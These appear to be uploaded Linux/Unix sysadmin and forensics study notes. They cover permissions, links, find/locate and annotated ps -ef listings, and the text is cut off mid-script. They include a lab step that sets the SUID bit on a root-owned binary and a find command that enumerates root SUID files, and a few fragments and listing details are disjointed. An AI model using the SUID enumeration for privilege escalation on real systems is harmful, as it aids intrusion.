Linuxnotes

The document provides an overview of Unix kernel functions, process instantiation, file metadata, and standard directories in the Unix file system. It also discusses various commands for managing users, groups, file permissions, and processes, along with examples of how to use the find and locate commands for file searching. Additionally, it explains the differences between hard and soft links and provides insights into process management and system services in Unix-like operating systems.

Uploaded by

Jon Wachter

1. Describe the main functions of the Unix Kernel.

Answer: The kernel is a set of critical programs that provide an environment where user
processes can execute and interact with system resources in a secure manner.

2. Describe the mechanisms of process instantiation on Unix systems.

Answer: A new process is created with two system calls: fork() duplicates the calling process, and the child then calls exec() to replace its image with the program to run. Every process except the first is therefore the child of an existing process, which is why the PPID column is useful when tracing a process tree.

3. What information constitutes the metadata of a file? Where is the metadata stored? Answer: Information about the object such as object
type (e.g., regular file, directory, pipe, etc.), access permissions, timestamps, etc. The metadata for the object is stored in a data structure
called an inode.

4. What are the standard directories found in the root of the Unix file system and what is stored within each?

- /etc - most configuration files
- /bin - system executables (called binaries) intended for users
- /sbin - system executables intended for administrators
- /var - dynamic (variable) information: log files, spool and cache data, traditionally web files
- /usr - secondary hierarchy of user-land programs, libraries and documentation that are not needed to boot the system
- /usr/bin - programs (not needed for boot) intended for users
- /usr/sbin - programs (not needed for boot) intended for admins
- /proc - virtual file system (not on disk) that exposes kernel and per-process state
- /boot - boot loader configuration and kernel images; anything needed before the kernel is running
- /tmp - temporary file storage
- /media - mount point for removable media (like a USB drive)

5. What indicators of compromise might one look for when analyzing the file system?

Answer: Look at where things live. For a running process, check the location of its executable, of any log files and of any other open resources; a daemon whose binary sits under /tmp or a home directory instead of /bin, /sbin or /usr/sbin is suspicious. On the file system itself, look for SUID/SGID binaries that should not be there and for modification times that do not line up with patching or installation.

6. In simple terms, what is a process? Answer: Processes are programs that run in user space. In addition to running user programs,
including application services, processes also run a large number of programs for the OS that do not require kernel space access.

7. List some common processes expected on a standard Linux box, but not on a Solaris box and vice versa. Answer: Page 163

8. The configuration files for programs are typically located in which directory? /etc

The startup configuration files for the system services are located in which directory for a systemd system?

The mechanics of starting or stopping daemons is performed by a set of shell scripts, often called init scripts or rc scripts. In a typical SystemV Unix system, the directory /etc/rc.d/init.d contains the startup script for each system service. This script is provided by the writer of each piece of software and must be written to accept one parameter: the action to take (start, stop, status, ...) when the script is run. In a typical systemd system, the unit files for packaged services live in /lib/systemd/system (or /usr/lib/systemd/system), and /etc/systemd/system holds administrator-created units and overrides; a unit in /etc takes precedence over one of the same name in /lib.
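The one-parameter contract described above, as an added example (this is not from the notes and not any distribution's script). It drives a placeholder daemon (sleep, a made-up stand-in for a real service) so it can be exercised without root, and its exit codes follow the LSB init-script conventions.

```shell
#!/bin/sh
# Added example, not from the original notes: a minimal SysV-style rc script.
# The "daemon" is a placeholder (sleep) so the script runs without root; a real
# script would launch the service binary and let it daemonize itself.
set -u

DAEMON=${DAEMON:-sleep}
DAEMON_ARGS=${DAEMON_ARGS:-300}
PIDFILE=${PIDFILE:-${TMPDIR:-/tmp}/example-daemon.$$.pid}

# True when the pid recorded in PIDFILE still exists.
running() { [ -r "$PIDFILE" ] && kill -0 "$(cat "$PIDFILE")" 2>/dev/null; }

# The single action argument every init script must accept.
rc_action() {
  case "${1:-}" in
    start)
      running && { echo "already running"; return 0; }
      "$DAEMON" "$DAEMON_ARGS" &
      echo $! > "$PIDFILE"
      return 0 ;;
    stop)
      running || { rm -f "$PIDFILE"; return 0; }   # LSB: stopping a stopped service succeeds
      pid=$(cat "$PIDFILE")
      kill "$pid"
      wait "$pid" 2>/dev/null || :                # reap it when it is our own child (as here)
      rm -f "$PIDFILE"
      return 0 ;;
    status)
      if running; then return 0; else return 3; fi ;;   # LSB: 3 = program is not running
    restart)
      rc_action stop && rc_action start ;;
    *)
      echo "Usage: ${0##*/} {start|stop|status|restart}" >&2
      return 2 ;;                                 # LSB: 2 = invalid or excess argument(s)
  esac
}

# Walk through the lifecycle when run directly.
rc_action start
rc_action status && echo "status: running"
rc_action stop
rc_action status || echo "status: not running (rc=$?)"
```

Installed under /etc/rc.d/init.d the script would end with `rc_action "$1"; exit $?`, and the S/K symlinks in the rcN.d directories would call it with start or stop. systemd replaces the whole script with a unit file whose ExecStart= names the daemon and lets systemd track the process itself.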

The log files for programs are typically found in which directory? /var/log
Information about the running instance of a program can be found in which directory? /proc

The default location for a non-administrative executable is in which directory? /usr/bin

Give the syntax/command to show which groups the user intern01 is a member of and list which groups (if any) are returned.
# groups intern01

Add a group to the CentOS machine called hackers, and provide the syntax/command used.
# groupadd hackers

Set the owner of the getUID file to the root account and provide the syntax/command used.
# chown root getUID

Set the group of the getUID file to hackers and provide the syntax/command used.
# chgrp hackers getUID

Explicitly set the octal permissions of the getUID file to: User/Owner: Read/Write/Execute, Group: Read/Execute, Other: None. What syntax/command was used?
# chmod 0750 getUID

Complete the following actions: Add the user intern01 to the hackers group. What syntax/command was used?
# usermod -a -G hackers intern01
(Without -a, usermod -G replaces the user's supplementary groups instead of adding to them.)

Set the SUID flag on the program getUID. What syntax/command was used?
# chmod u+s getUID
(Equivalent to chmod 4750 getUID. Because the file is now owned by root, anyone allowed to execute it runs it with root's effective UID.)

Change the user and group owners to match the exhibit.
# su root
# chown leale:managment data1
# chown enairn:engineer data2
# chown rsanch:syseng data3

Change the data file permissions to match the exhibit. Use the absolute octal notation.

Command                      Definition
cat [FILE]                   Concatenate file to screen
cd                           Change directory
cp [source] [target]         Copy source to target
file                         Determine file type
find                         Search for files in a directory hierarchy
grep PATTERN [FILE]          Print lines matching PATTERN from FILE
groupadd                     Create a new group
groups                       Print the groups a user belongs to
head [FILE]                  Output the first 10 lines of a file
less [FILE]                  Similar to more but handles larger files much faster
locate                       Find files by name (Linux)
ln -s [target] [link_name]   Create a symbolic link LINK_NAME pointing at TARGET
ls                           Directory listing
man                          Display online help
man -k SEARCH_STRING         Search the man page descriptions for SEARCH_STRING
more [FILE]                  Output the contents of FILE one screen at a time

# touch /tmp/file.txt
# touch /tmp/other.txt
Create a soft (or symbolic) link in the root account's home directory named myTempFile that links to /tmp/file.txt.
What syntax/command was used?

# ln -s /tmp/file.txt myTempFile
What is the expected output of the following?

# echo "hello world" > /tmp/file.txt


# cat myTempFile

hello world
Run the following commands and explain the results:

# rm -f /tmp/file.txt
# ls -l myTempFile
Deleting the original file breaks the symbolic link. ls -l still lists myTempFile -> /tmp/file.txt, because the link itself (a small file holding that path) is intact; a colorized ls shows the dangling link in red.

Run the following command and explain the results:

# cat myTempFile
cat: myTempFile: No such file or directory. The link resolves to a path that no longer exists.

Create a hard link in the root account's home directory named otherTempFile that links to /tmp/other.txt.
What syntax/command was used?

# ln /tmp/other.txt otherTempFile

# echo -e "one\ntwo\nthree" > /tmp/other.txt


# wc -l otherTempFile
echo -e interprets the \n escapes, so /tmp/other.txt is written with each word on its own line.
wc -l counts the lines in the file and displays 3; otherTempFile is another name for the same inode, so it sees the same data.
Run the following commands and explain the results:
# rm -f /tmp/other.txt
# ls -l otherTempFile
A long listing of otherTempFile is displayed as for any regular file. The link count in the second column has dropped from 2 to 1, and nothing in the listing indicates that it was ever a hard link.

Run the following command and explain the results:

# cat otherTempFile
Additionally, explain the critical difference between hard and soft links.
The command cat displays the contents of the file:

one
two
three
With hard links, deleting the source file does not affect the new file: both names point at the same inode, and the data is only freed when the last name is removed. A soft link is a separate file that stores a path, so it breaks as soon as that path disappears. A soft link can also point across file systems and at directories, which a hard link cannot.
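The two behaviours above, as an added example that is not from the original notes: it builds both kinds of link in a scratch directory and reports what stat(1) sees at each step. It assumes GNU stat (the -c format option) and mktemp; the file names are made up for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original notes: exercise hard and soft links in a
# scratch directory and report what stat(1) sees at each step (GNU stat assumed).
set -eu

link_demo() (
  dir=$(mktemp -d)
  cd "$dir"
  printf 'one\ntwo\nthree\n' > target.txt
  ln -s target.txt soft_link     # stores the *name* target.txt, not its inode
  ln target.txt hard_link        # a second name for the same inode

  inode_target=$(stat -c %i target.txt)
  inode_hard=$(stat -c %i hard_link)
  nlink_before=$(stat -c %h target.txt)   # link count: 2 after ln

  rm -f target.txt                        # removes one name, not the data

  # The symlink dangles: the name it stores no longer resolves.
  if cat soft_link >/dev/null 2>&1; then soft=alive; else soft=dangling; fi
  # The hard link still reaches the data; the link count drops to 1.
  hard_lines=$(wc -l < hard_link | tr -d ' ')
  nlink_after=$(stat -c %h hard_link)

  cd / && rm -rf "$dir"
  echo "$inode_target $inode_hard $nlink_before $soft $hard_lines $nlink_after"
)

# Fields: inode(target) inode(hard_link) links-before soft-link-state lines-via-hard-link links-after
link_demo
```

The two inode numbers are identical and the link count goes 2 -> 1, which is exactly what `ls -l` shows in the second column; the symlink keeps its `soft_link -> target.txt` entry but cannot be read.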
Finding files that match certain criteria is a common task on a filesystem. Linux and BSD variants generally install the locate package, which
creates an indexed database of filenames (created using the updatedb command and usually installed as a cron job) and uses the locate
command to find files. The locate command is fast, but it is limited to searching filenames.
All UNIX variants support the find command, and it can search on a much more robust set of characteristics than locate. The search can be
slow as the query is conducted in real time. The find command is powerful but has a bit of a learning curve.
The basic syntax of the find command is shown below:

find <path> <criteria> <actions>

Path
<path> Indicates the path in the filesystem to begin the search and recursively searches unless configured otherwise.

Criteria
-name - Examine the filename. Wildcards (*) can be used; quote or escape them so the shell does not expand them before find sees them.
-user - Examine the owner of the file.
-perm - Examine file permissions.
Note: Multiple criteria are joined with a Boolean 'and' operator by default.

Actions
The actions can be useful but are beyond the scope of this lesson. By default, if no actions are added, the -print action is assumed, which
prints all matches to STDOUT.

Example
The following syntax/command can be used to search the entire filesystem for any file named passwd:

# find / -name passwd


Answer the following:
Run the following commands on the Ubuntu machine as the user nimda and explain the results:

# locate apache2.conf
# locate /etc*apache2.conf
The first locate command lists every indexed path that contains the string apache2.conf.
The second pattern contains a wildcard, so locate matches it against the whole path: only paths that begin with /etc and end in apache2.conf are returned.
Run the following commands on the Solaris machine as the user root and explain the results:

locate httpd.conf
locate */httpd.conf
The first locate command lists every indexed path that contains the string httpd.conf.
The second pattern contains a wildcard, so it must match the whole path; */httpd.conf returns only files whose name is exactly httpd.conf.
On the CentOS, Ubuntu and Solaris machines, find all files owned by the root user and document the syntax/command used.
Note: Ubuntu commands will need to be run with the sudo command.

find / -user root


On the CentOS, Ubuntu, and Solaris machines, find all files that meet the criteria below and document the syntax/command used:

- Filename ends in the text log
- Located in the /var directory
- Modified within the past week

Note: Ubuntu commands will need to be run with the sudo command.

find /var -name \*.log -mtime -7 -type f


On the CentOS machine, find all files that have been modified since the start of the day and document the syntax/command used.

find / -daystart -mtime 0 -type f
(-daystart makes -mtime measure from the start of today instead of from 24 hours ago; on its own it selects nothing, it needs a time test such as -mtime 0 to act on.)


On the CentOS machine, find all files ending with the extension .py and count them. Research and use the nice and ionice commands only to
search when the system is not doing other critical tasks.
Document the syntax/command used and number of files found.

# sudo nice -n 19 ionice -c 3 find / -name \*.py -type f | wc -l


1047
On the CentOS machine, find all files modified before January 1, 2000.
Document the syntax/commands used.

find / -not -newermt "Jan 01, 2000" -ls


On the CentOS machine, find all filenames that contain the text log and pipe the output to the xargs command. As an argument to xargs, use the grep command, insensitive of case, to search through each of the found files for the text error.
Document the syntax/commands used.

find / -name \*log\* -type f | xargs grep -i "error"
(If file names may contain spaces or newlines, use find ... -print0 | xargs -0 grep -i "error" so that xargs splits on NUL rather than whitespace.)

UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan20 ? 00:00:00 init [3]
    The machine is in runlevel 3, shown in brackets next to the init process in this version of Linux's process listing.
root 2 1 0 Jan20 ? 00:00:00 [migration/0]
root 3 1 0 Jan20 ? 00:00:00 [ksoftirqd/0]
root 4 1 0 Jan20 ? 00:00:00 [migration/1]
root 5 1 0 Jan20 ? 00:00:00 [ksoftirqd/1]
root 6 1 0 Jan20 ? 00:00:00 [events/0]
root 7 1 0 Jan20 ? 00:00:00 [events/1]
    Per-CPU kernel threads carry a /N suffix, one instance per processor core. [migration/0], [ksoftirqd/0] and [events/0], to name three, each have a /1 twin, which denotes a dual-core processor.
root 8 1 0 Jan20 ? 00:00:00 [khelper]
root 9 1 0 Jan20 ? 00:00:00 [kthread]
root 13 9 0 Jan20 ? 00:00:00 [kblockd/0]
root 14 9 0 Jan20 ? 00:00:00 [kblockd/1]
root 15 9 0 Jan20 ? 00:00:00 [kacpid]
root 174 9 0 Jan20 ? 00:00:00 [cqueue/0]
root 175 9 0 Jan20 ? 00:00:00 [cqueue/1]
root 178 9 0 Jan20 ? 00:00:00 [khubd]
root 180 9 0 Jan20 ? 00:00:00 [kseriod]
root 251 9 0 Jan20 ? 00:00:00 [khungtaskd]
root 252 9 0 Jan20 ? 00:00:00 [pdflush]
root 253 9 0 Jan20 ? 00:00:00 [pdflush]
    Linux shows kernel threads in brackets. pdflush exists in kernel versions 2.6.0 through 2.6.31; /proc shows two instances of it here.
root 254 9 0 Jan20 ? 00:00:00 [kswapd0]
root 255 9 0 Jan20 ? 00:00:00 [aio/0]
root 256 9 0 Jan20 ? 00:00:00 [aio/1]
root 475 9 0 Jan20 ? 00:00:00 [kpsmoused]
root 3619 1 0 Jan20 ? 00:00:00 cupsd
root 3637 1 0 Jan20 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp 3654 1 0 Jan20 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root 3677 1 0 Jan20 ? 00:00:00 sendmail: accepting connections
smmsp 3685 1 0 Jan20 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root 3700 1 0 Jan20 ? 00:00:00 gpm -m /dev/input/mice -t exps2
root 3714 1 0 Jan20 ? 00:00:00 crond
xfs 3746 1 0 Jan20 ? 00:00:00 xfs -droppriv -daemon
root 3773 1 0 Jan20 ? 00:00:00 /usr/sbin/atd
avahi 3801 1 0 Jan20 ? 00:00:00 avahi-daemon: running [core-u03.local]
avahi 3802 3801 0 Jan20 ? 00:00:00 avahi-daemon: chroot helper
root 3833 1 0 Jan20 ? 00:00:00 /usr/sbin/smartd -q never
root 3837 1 0 Jan20 ? 00:00:00 login -- enairn
root 3838 1 0 Jan20 tty2 00:00:00 /sbin/mingetty tty2
root 3839 1 0 Jan20 tty3 00:00:00 /sbin/mingetty tty3
    A console is a physical keyboard and display connected to a computer. Virtual consoles provide several such consoles in software. getty is the terminal interface to the system on a console; mingetty does the same for virtual consoles. PIDs 3837, 3838 and 3839 (all root) were spawned by init; the login on 3837 spawned enairn's bash shell (19118, on tty1).
root 3854 1 0 Jan20 ? 00:00:00 /usr/bin/python -tt /usr/sbin/yum-updatesd
root 3856 1 0 Jan20 ? 00:00:00 /usr/libexec/gam_server
root 4009 1 0 Jan20 ? 00:00:00 /usr/sbin/httpd
apache 4012 4009 0 Jan22 ? 00:00:00 /usr/sbin/httpd
apache 4013 4009 0 Jan22 ? 00:00:00 /usr/sbin/httpd
    Are the apache processes a concern? No. They are children of the httpd parent (4009). It is not uncommon for such a service to start 5-10 children to handle initial connections and then spawn more as needed, and it is normal for a server to drop privileges in the children it spawns. It would be concerning if the children were running as apache and one child were running as root.
root 19060 3605 0 10:09 ? 00:00:00 sshd: intern01 [priv]
intern01 19062 19060 0 10:09 ? 00:00:00 sshd: intern01@pts/0
intern01 19064 19062 0 10:09 pts/0 00:00:00 -bash
    The leading dash marks a login shell; its parent chain leads back to sshd, so intern01 is logged in via SSH.
enairn 19118 3837 0 10:17 tty1 00:00:00 -bash
intern01 19152 19064 0 10:18 pts/0 00:00:00 ps -ef
intern01 19153 19064 0 10:18 pts/0 00:00:00 more
root 19163 19064 0 10:21 pts/0 00:00:00 su - root
root 19165 19163 0 10:21 pts/0 00:00:00 -bash

More Notes
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 09:35:46 ? 0:01 sched
    STIME shows the day and time the machine started.
root 5 0 0 09:35:44 ? 0:01 zpool-rpool
root 0 0 0 09:35:47 ? 0:00 kmem_task
root 1 0 0 09:35:47 ? 0:00 /usr/sbin/init
    kmem_task is a Solaris 11 process. init, which is expected to be present with PID 1, runs from /usr/sbin (Solaris 10 init runs from /sbin).
root 0 0 0 09:35:47 ? 0:00 pageout
root 0 0 0 09:35:47 ? 0:00 fsflush
    Which OS? Solaris. The first entry is the kernel thread sched, which indicates that this process list came from a Solaris system; the two kernel threads pageout and fsflush (note their PPID of 0) confirm it.
root 7 0 0 09:35:47 ? 0:00 intrd
root 8 0 0 09:35:47 ? 0:00 vmtasks
root 117 0 0 09:35:57 ? 0:00 /usr/lib/pfexecd
root 11 1 0 09:35:48 ? 0:02 /lib/svc/bin/svc.startd
root 13 1 0 09:35:48 ? 0:10 /lib/svc/bin/svc.configd
root 620 0 0 09:36:03 ? 0:00 /usr/sbin/nscd
netadm 381 1 0 09:36:00 ? 0:00 /lib/inet/nwamd
netcfg 40 1 0 09:35:51 ? 0:00 /lib/inet/netcfgd
root 734 710 0 09:36:06 ? 0:00 /usr/lib/hal/hald-addon-storage
root 709 0 0 09:36:04 ? 0:00 /usr/lib/hal/hald --daemon yes
dladm 48 0 0 09:35:53 ? 0:00 /usr/sbin/dlmgmtd
root 753 0 0 09:36:07 ? 0:00 /usr/lib/inet/inetd start
daemon 65 0 0 09:35:54 ? 0:00 /lib/crypto/kcfd

UID PID PPID C STIME TTY TIME CMD

root 1 0 0 Jan30 ? 00:00:01 init [3]
    STIME gives the date the machine started; the bracketed 3 is the runlevel.
root 2 1 0 Jan30 ? 00:00:00 [migration/0]
root 3 1 0 Jan30 ? 00:00:00 [ksoftirqd/0]
root 4 1 0 Jan30 ? 00:00:00 [migration/1]
root 5 1 0 Jan30 ? 00:00:00 [ksoftirqd/1]
root 6 1 0 Jan30 ? 00:00:00 [events/0]
root 7 1 0 Jan30 ? 00:00:00 [events/1]
root 8 0 0 Jan30 ? 00:00:00 [khelper]
root 9 0 0 Jan30 ? 00:00:00 [kthread]
root 13 9 0 Jan30 ? 00:00:00 [kblockd/0]
root 14 9 0 Jan30 ? 00:00:00 [kblockd/1]
root 15 9 0 Jan30 ? 00:00:00 [kacpid]
root 174 9 0 Jan30 ? 08:00:00 [cqueue/0]
root 175 9 0 Jan30 ? 00:00:08 [cqueue/1]
root 178 9 0 Jan30 ? 00:00:08 [khubd]
root 180 9 0 Jan30 ? 00:00:00 [kseriod]
root 251 9 0 Jan30 ? 00:00:00 [khungtaskd]
root 252 9 0 Jan30 ? 00:00:00 [pdflush]
root 253 9 0 Jan30 ? 00:00:00 [pdflush]
root 254 9 0 Jan30 ? 00:00:00 [kswapd0]
root 255 9 0 Jan30 ? 00:00:00 [aio/0]
root 256 9 0 Jan30 ? 00:00:00 [aio/1]
root 475 9 0 Jan30 ? 00:00:00 [kpsmoused]
root 516 9 0 Jan30 ? 00:00:00 [mpt_poll_0]
root 517 9 0 Jan30 ? 00:00:00 [mpt/0]
root 518 9 0 Jan30 ? 00:00:00 [scsi_eh_0]
root 522 9 0 Jan30 ? 00:00:00 [ata/0]
root 523 9 0 Jan30 ? 00:00:00 [ata/1]
root 524 9 0 Jan30 ? 00:00:00 [ata_aux]
root 531 9 0 Jan30 ? 00:00:00 [kstriped]
root 544 9 0 Jan30 ? 00:00:00 [ksnapd]
root 568 9 0 Jan30 ? 00:00:00 [kjournald]
root 594 9 0 Jan30 ? 00:00:00 [kauditd]
root 627 1 0 Jan30 ? 00:00:00 /sbin/udevd -d
intern01 1768 3843 0 06:32 tty1 00:00:00 -bash
    The dash marks a login shell: a user session is logged into the system on tty1.
root 1819 3859 0 06:37 ? 00:00:00 /usr/bin/python -tt /usr/libexec
intern01 1824 6378 0 06:37 pts/0 00:00:00 ps -ef
    Did the logged-in user start any processes? Yes: tracing PPID 6378 back to intern01's login shell shows that intern01 ran ps -ef.

root 1906 9 0 Jan30 ? 00:00:00 [kmpathd/0]


root 1907 9 0 Jan30 ? 00:00:00 [kmpathd/1]
root 1908 9 0 Jan30 ? 00:00:00 [kmpath_handlerd]
root 1930 9 0 Jan30 ? 00:00:00 [kjournald]
root 2373 9 0 Jan30 ? 00:00:01 [vmmemctl]
root 2546 1 0 Jan30 ? 00:00:14 /usr/sbin/vmtoolsd
root 2597 1 0 Jan30 ? 00:00:00 /usr/lib/vmware-vgauth/VGAuthSer
root 2690 9 0 Jan30 ? 00:00:00 [iscsi_eh]
root 2732 9 0 Jan30 ? 00:00:00 [cnic_wq]
root 2738 9 0 Jan30 ? 00:00:00 [bnx2i_thread/0]
root 2739 9 0 Jan30 ? 00:00:00 [bnx2i_thread/1]
root 2750 9 0 Jan30 ? 00:00:00 [ib_addr]
root 2761 9 0 Jan30 ? 00:00:00 [ib_mcast]
root 2762 9 0 Jan30 ? 00:00:00 [ib_inform]
root 2763 9 0 Jan30 ? 00:00:00 [local_sa]
root 2767 9 0 Jan30 ? 00:00:00 [iw_cm_wq]
root 2771 9 0 Jan30 ? 00:00:00 [ib_cm/0]
root 2772 9 0 Jan30 ? 00:00:00 [ib_cm/1]
root 2776 9 0 Jan30 ? 08:00:00 [rdma_cm]
root 2794 1 0 Jan30 ? 00:00:00 iscsiuio
root 2799 1 0 Jan30 ? 00:00:00 iscsid
root 2801 1 0 Jan30 ? 00:00:00 iscsid
root 3141 1 0 Jan30 ? 00:00:00 auditd
root 3143 3141 0 Jan30 ? 00:00:00 /sbin/audispd
root 3226 1 0 Jan30 ? 00:00:01 irqbalance
rpc 3259 1 0 Jan30 ? 00:00:00 portmap
root 3294 9 0 Jan30 ? 00:00:00 [rpciod/0]
root 3295 9 0 Jan30 ? 00:00:00 [rpciod/1]
rpcuser 3303 1 0 Jan30 ? 00:00:00 rpc.statd
root 3341 1 0 Jan30 ? 00:00:00 rpc.idmapd
dbus 3373 1 0 Jan30 ? 00:00:00 dbus-daemon --system
root 3450 1 0 Jan30 ? 00:00:00 pcscd
root 3465 1 0 Jan30 ? 00:00:00 /usr/sbin/acpid
68 3484 1 0 Jan30 ? 00:00:03 hald
root 3485 3484 0 Jan30 ? 00:00:00 hald-runner
68 3493 3485 0 Jan30 ? 00:00:00 hald-addon-acpi: listening on ac
68 3499 3485 0 Jan30 ? 00:00:00 hald-addon-keyboard: listening o
root 3508 3485 0 Jan30 ? 00:00:40 hald-addon-storage: polling /dev
root 3557 1 0 Jan30 ? 00:00:00 /sbin/rsyslogd -i /var/run/rsysl
root 3586 1 0 Jan30 ? 00:00:00 automount
root 3611 1 0 Jan30 ? 00:00:00 /usr/sbin/sshd
root 3625 1 0 Jan30 ? 00:00:00 cupsd
root 3643 1 0 Jan30 ? 00:00:00 xinetd -stayalive -pidfile /var/
ntp 3660 1 0 Jan30 ? 00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd
root 3683 1 0 Jan30 ? 00:00:00 sendmail: accepting connections
smmsp 3691 1 0 Jan30 ? 00:00:00 sendmail: Queue runner@01:00:00
root 3706 1 0 Jan30 ? 00:00:00 gpm -m /dev/input/mice -t exps2
root 3720 1 0 Jan30 ? 00:00:00 crond
xfs 3752 1 0 Jan30 ? 00:00:00 xfs -droppriv -daemon
root 3779 1 0 Jan30 ? 00:00:00 /usr/sbin/atd
avahi 3807 1 0 Jan30 ? 00:00:00 avahi-daemon: running [core-u03.
avahi 3808 3807 0 Jan30 ? 00:00:00 avahi-daemon: chroot helper
root 3839 1 0 Jan30 ? 00:00:00 /usr/sbin/smartd -q never
root 3843 1 0 Jan30 ? 00:00:00 login -- intern01
root 3844 1 0 Jan30 tty2 00:00:00 /sbin/mingetty tty2
root 3845 1 0 Jan30 tty3 00:00:00 /sbin/mingetty tty3
root 3846 1 0 Jan30 tty4 00:00:00 /sbin/mingetty tty4
root 3851 1 0 Jan30 tty5 00:00:00 /sbin/mingetty tty5
root 3856 1 0 Jan30 tty6 00:00:00 /sbin/mingetty tty6
root 3859 1 0 Jan30 ? 00:00:00 /usr/bin/python -tt /usr/sbin/yu
root 3861 1 0 Jan30 ? 00:00:00 /usr/libexec/gam_server
root 6374 3611 0 Jan30 ? 00:00:00 sshd: intern01 [priv]
intern01 6377 6374 0 Jan30 ? 00:00:00 sshd: intern01@pts/0
intern01 6378 6377 0 Jan30 pts/0 00:00:00 -bash
    The dash marks a login shell: this session is logged in over SSH (its parent 6377 is sshd: intern01@pts/0, whose parent chain leads to /usr/sbin/sshd).
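The checks done by eye in the listings above (a daemon's children running as an unexpected user, login shells marked by a leading dash, and tracing a PID back through its parents) as an added awk example over a ps -ef listing. The listing is constructed for the demonstration and is not the page's own output; the functions and their names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original notes: automate three of the manual
# ps -ef checks. SAMPLE is a constructed listing, not captured from a host.
set -eu

SAMPLE='UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan30 ?        00:00:01 init [3]
root      3611     1  0 Jan30 ?        00:00:00 /usr/sbin/sshd
root      4009     1  0 Jan30 ?        00:00:00 /usr/sbin/httpd
apache    4012  4009  0 Jan30 ?        00:00:00 /usr/sbin/httpd
apache    4013  4009  0 Jan30 ?        00:00:00 /usr/sbin/httpd
root      4014  4009  0 Jan30 ?        00:00:00 /usr/sbin/httpd
root      6374  3611  0 Jan30 ?        00:00:00 sshd: intern01 [priv]
intern01  6377  6374  0 Jan30 ?        00:00:00 sshd: intern01@pts/0
intern01  6378  6377  0 Jan30 pts/0    00:00:00 -bash
intern01  1824  6378  0 06:37 pts/0    00:00:00 ps -ef'

# Children of one parent that run as a user none of their siblings use.
# Prints "PID PPID UID" per outlier. Children of init (PPID 1) are skipped:
# reparented daemons are not siblings of one service.
odd_children() {
  printf '%s\n' "$SAMPLE" | awk 'NR>1 { uid[$2]=$1; ppid[$2]=$3 }
    END {
      for (p in ppid) { par=ppid[p]
        if (par!="0" && par!="1") { n[par]++; c[par,uid[p]]++ } }
      for (p in ppid) { par=ppid[p]
        if (n[par]>1 && c[par,uid[p]]==1) printf "%s %s %s\n", p, par, uid[p] }
    }'
}

# Login shells: CMD starts with a dash. Prints "PID UID TTY".
login_shells() {
  printf '%s\n' "$SAMPLE" | awk 'NR>1 && $8 ~ /^-/ { print $2, $1, $6 }'
}

# Walk PPIDs from a pid up to init and print the chain.
ancestry() {
  printf '%s\n' "$SAMPLE" | awk -v pid="$1" 'NR>1 { ppid[$2]=$3 }
    END {
      chain=pid; p=pid
      while ((p in ppid) && ppid[p] != "0") { p=ppid[p]; chain=chain " " p }
      print chain
    }'
}

echo "odd children:"; odd_children      # 4014 4009 root: a root child among apache workers
echo "login shells:"; login_shells      # 6378 intern01 pts/0
echo "ancestry of 1824:"; ancestry 1824 # 1824 6378 6377 6374 3611 1
```

On a real host replace the SAMPLE with `ps -ef` output; the root httpd worker among apache workers is exactly the case the notes call out as concerning, and the ancestry chain ending in sshd is how "logged in via SSH" is established.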

$ cd /tmp
$ touch ford.txt
$ ln -s ford.txt link_ford.txt
$ rm -f ford.txt
$ ls -alg link_ford.txt
lrwxrwxrwx 1 root 9 May 19 13:09 link_ford.txt -> ford.txt
3. Modify and change

4. Access

What timestamps will update on the directory when using tab completion?

A directory's atime updates whenever its contents are read, which is what happens when the shell lists the directory to complete a filename. Caveat: most Linux systems mount with relatime, so the atime is only rewritten when it is older than the mtime/ctime or more than a day old; with noatime it never updates.
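Which timestamp each operation touches, as an added example (not from the notes): it rewinds a scratch file's mtime with touch, then applies a metadata change and a content change and reads the mtime and ctime after each. GNU stat and touch are assumed; the file name and date are made up.

```shell
#!/bin/sh
# Added example, not from the original notes: observe mtime vs ctime on a
# scratch file. atime is left out of the checks because relatime/noatime
# mounts make it unreliable to test.
set -eu

timestamps() { stat -c '%Y %Z' "$1"; }   # mtime ctime, in epoch seconds

stamp_demo() {
  dir=$(mktemp -d); f="$dir/f"
  printf 'data\n' > "$f"
  touch -d '2000-01-01 00:00:00 UTC' "$f"   # mtime rewound; ctime becomes "now" (it cannot be set)
  set -- $(timestamps "$f"); m1=$1; c1=$2
  chmod 600 "$f"                            # metadata change: ctime only, mtime untouched
  set -- $(timestamps "$f"); m2=$1; c2=$2
  printf 'more\n' >> "$f"                   # content change: mtime and ctime both move
  set -- $(timestamps "$f"); m3=$1; c3=$2
  rm -rf "$dir"
  echo "$m1 $c1 $m2 $c2 $m3 $c3"
}

# Fields: mtime ctime after touch, after chmod, after append.
stamp_demo
```

The point for forensics: an attacker can backdate mtime with touch, but ctime is set by the kernel and cannot be written from user space, so a file whose ctime is far newer than its mtime deserves a second look.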

Susan executes the following program:

-r-sr-s--x 1 billy admin 0 Aug 14 10:09 file1
Susan belongs to the following groups (and is the only member of the developers group):
# groups susan
susan : susan admin developers
The resulting process will run as what user and group?
User: billy (the set-user-ID bit, the s in the owner's execute position, makes the effective UID the file's owner)
Group: admin (the set-group-ID bit, the s in the group's execute position, makes the effective GID the file's group)
Susan's own memberships only decide whether she may execute the file at all; she can, through admin (r-s) or through the other bits (--x).
Provide a command that will search the entire file system for all files that are both owned by user root and have their SUID bit set

sudo find / -user root -perm -4000

OR
sudo find / -perm -4000 -user root
(-perm -4000 matches files that have at least the SUID bit set, whatever the other bits are; -perm 4000 would require exactly that mode, and -perm /6000 would match SUID or SGID.)
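The find criteria used in the exercises above (-name, -mtime, -newermt, -perm, -user, and the xargs grep pipeline) and the SUID search just given, as one added example that is not from the notes: it builds a small scratch tree with known contents so each search has a predictable answer. GNU find, stat and touch are assumed; the tree layout, file names and contents are constructed for the demonstration, and the files are owned by whoever runs it rather than by root.

```shell
#!/bin/sh
# Added example, not from the original notes: run the find(1) searches from the
# exercises against a scratch tree built here (GNU findutils/coreutils assumed).
set -eu

# Build: /var/log with a fresh and a pre-2000 log, a SUID "getUID", a hidden script.
build_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/var/log" "$root/tmp" "$root/usr/bin"
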